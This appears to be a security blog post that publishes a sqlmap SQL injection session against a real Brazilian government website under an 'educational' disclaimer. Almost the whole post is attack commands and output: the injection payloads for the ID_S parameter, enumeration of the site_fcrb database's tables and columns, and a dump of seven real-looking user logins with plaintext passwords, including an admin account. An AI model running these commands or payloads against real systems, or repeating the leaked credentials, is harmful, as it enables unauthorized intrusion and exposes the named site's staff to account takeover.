Rui Barbosa Brazilian Government Site Compromised Via SQLi (sqlmap PoC Scan) | BOT24

Rui Barbosa Brazilian Government Site Compromised Via SQLi (sqlmap PoC Scan)


As always this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the exploit .Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act. Please do your part in helping to inform those who have been exploited as you would want others to notify you if your critical data had been compromised. Karma!




 root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:34

[00:27:34] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:34] [INFO] resuming injection data from session file
[00:27:34] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:36] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:36

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:46

[00:27:47] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:47] [INFO] resuming injection data from session file
[00:27:47] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:47] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:48] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:48] [INFO] fetching tables for database 'site_fcrb'
[00:27:48] [INFO] read from file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session': site_fcrb, niveis, site_fcrb, nivel_0, site_fcrb, nivel_1, site_fcrb, nivel_2, site_fcrb, tb_campanhas, site_fcrb, tb_canal, site_fcrb, tb_canalsecao, site_fcrb, tb_links, site_fcrb, tb_materias, site_fcrb, tb_secoes, site_fcrb, tb_usuarios
Database: site_fcrb
[11 tables]
+---------------+
| niveis        |
| nivel_0       |
| nivel_1       |
| nivel_2       |
| tb_campanhas  |
| tb_canal      |
| tb_canalsecao |
| tb_links      |
| tb_materias   |
| tb_secoes     |
| tb_usuarios   |
+---------------+

[00:27:48] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:48

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb -T tb_usuarios --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:27:55

[00:27:55] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:27:55] [INFO] resuming injection data from session file
[00:27:55] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:27:55] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:27:56] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:27:56] [INFO] fetching columns for table 'tb_usuarios' on database 'site_fcrb'
[00:27:56] [INFO] read from file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session': id_usuario, int(10) unsigned, id_login, varchar(10), nm_login, varchar(60), st_ativo, tinyint(3) unsigned, id_senha, varchar(12), id_grupo, tinyint(3) unsigned
Database: site_fcrb
Table: tb_usuarios
[6 columns]
+------------+---------------------+
| Column     | Type                |
+------------+---------------------+
| id_grupo   | tinyint(3) unsigned |
| id_login   | varchar(10)         |
| id_senha   | varchar(12)         |
| id_usuario | int(10) unsigned    |
| nm_login   | varchar(60)         |
| st_ativo   | tinyint(3) unsigned |
+------------+---------------------+

[00:27:56] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:27:56

root@root:/pentest/web/scanners/sqlmap# python sqlmap.py -u http://casaruibarbosa.gov.br/interna.php?ID_S=9 -D site_fcrb -T tb_usuarios -C 'id_login,id_senha' --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 00:28:51

[00:28:51] [INFO] using '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/session' as session file
[00:28:51] [INFO] resuming injection data from session file
[00:28:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[00:28:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ID_S
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ID_S=9 AND 9220=9220

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: ID_S=9 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,117,113,121,58),IFNULL(CAST(CHAR(78,69,88,112,83,69,113,114,117,84) AS CHAR),CHAR(32)),CHAR(58,99,104,97,58)), NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: ID_S=9 AND SLEEP(5)
---

[00:28:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.10, ASP.NET, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0.11
[00:28:52] [INFO] fetching columns 'id_login, id_senha' entries for table 'tb_usuarios' on database 'site_fcrb'
Database: site_fcrb
Table: tb_usuarios
[7 entries]
+------------+-------------+
| id_login   | id_senha    |
+------------+-------------+
| admin      | empreteco   |
| claudialts | fcrbclaudia |
| elizabeth  | 6937        |
| germeson   | andreia1212 |
| fcrb       | FCRB3289    |
| anapessoa  | 129702      |
| adrianasm  | dri123      |
+------------+-------------+

[00:28:53] [INFO] Table 'site_fcrb.tb_usuarios' dumped to CSV file '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br/dump/site_fcrb/tb_usuarios.csv'
[00:28:53] [INFO] Fetched data logged to text files under '/pentest/web/scanners/sqlmap/output/casaruibarbosa.gov.br'

[*] shutting down at: 00:28:53

root@root:/pentest/web/scanners/sqlmap#




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Share on Google Plus

About Bradley Susser

    Blogger Comment
    Facebook Comment

0 comments :

Post a Comment